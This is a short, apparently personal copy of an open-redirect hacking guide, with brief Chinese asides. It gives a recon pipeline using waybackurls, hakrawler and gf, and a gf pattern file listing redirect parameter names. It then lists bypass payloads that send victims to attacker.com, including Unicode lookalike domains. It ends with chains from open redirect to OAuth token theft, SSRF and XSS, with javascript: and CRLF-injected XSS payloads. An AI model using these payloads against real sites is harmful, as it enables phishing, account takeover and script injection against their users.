https://0x00sec.org/t/open-redirection-guide/21118
工具都是go语言的,不太会用,留个坑
Identifing possible vulnerable endpoints:
-
waybackurls 10 + hakrawler 9 + gf 11
1.
cat subdomains | waybackurls | tee -a urls
2.cat subdomains | hakrawler -depth 3 -plain | tee -a urls
3.gf redirect urls
using
redirect.json
withgf
:
{
"flags" : "-HanrE",
"pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
}
- Google dorks
site:domain.com inurl:[PARAMETER]
using a parameter list 21 - Manual inspection by navigating the webapp and intercepting the requests
Confirm and exploit:
* https://company.com/?redirect=http://attacker.com
* https://company.com/?redirect=http://company.com.attacker.com
* https://company.com/?redirect=https://company.com@attacker.com
* https://company.com/?redirect=//attacker.com
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com
* https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
Using special characters:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。
Escalating to other vulnerabilities:
Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS
Source 4
Escalate to XSS
https://company.com/?redirect=javascript:alert(1)
https://company.com/?redirect=javascript:prompt(1)
Escalate to XSS using CRLFi
https://company.com/?redirect=java%0d%0ascript%0d%0a:alert(0)
- 还有个xss速查
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet